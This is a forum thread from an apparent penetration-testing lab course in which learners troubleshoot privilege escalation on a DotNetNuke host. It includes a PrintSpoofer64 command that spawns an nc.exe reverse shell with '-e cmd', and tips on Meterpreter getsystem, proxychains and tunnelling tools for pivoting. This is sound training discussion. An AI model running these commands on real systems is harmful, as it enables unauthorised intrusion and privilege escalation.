ATTACKING ENTERPRISE NETWORKS - Exploitation & Privilege Escalation

Dear all, I ask information about the first step to escalation with PrintSpoofer64. I make all step but when run this command:
c:\DotNetNuke\Portals\0\PrintSpoofer64.exe -c “c:\DotNetNuke\Portals\0\nc.exe 443 -e cmd”
I receive this error:[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening…
CreateProcessAsUser() failed. Error: 216

1 Like

I solve it with htb support.

hey man do you remmeber how you solved this issue

I got a revshell in meterpreter and escalated with “getsystem” command, it will execute what printspooler does with print spooler named pipes

1 Like

How did you get meterpreter lister? If the payload executes on the DNN, and only host in the same network is DMZ1, which doesnt have msfconsole, how did you do that? I have the SSH tunel with proxychains, but this is reverse connection. Not sure how would i make it work in both directions.

It was long time i fixed that but to get a trace shell back you have to used autoroute and proxy chains plus there is a part in the pivoting module on how to use bind shells to archive same!

If you want to take it further you can use tools like ligolo-ng to create full tunnels that will make your life easier but that’s probably out of scope since they want you to use the MSF Console

1 Like

Yes, I’ve somehow managed to completely skip the part about Reverse Port Forwarding via ssh. I’ve made it work afterwards.

Thank you for the tip on ligolo-ng. Will check it out!

1 Like

No problem mate! As I said was long time so my memory is a bit thin, but that pivoting class is good stuff to know specially if you start to do prolabs where you have to pivot

Use the second alternative method. (go below on the page) I don’t know why but 1st method doesn’t work on my session either.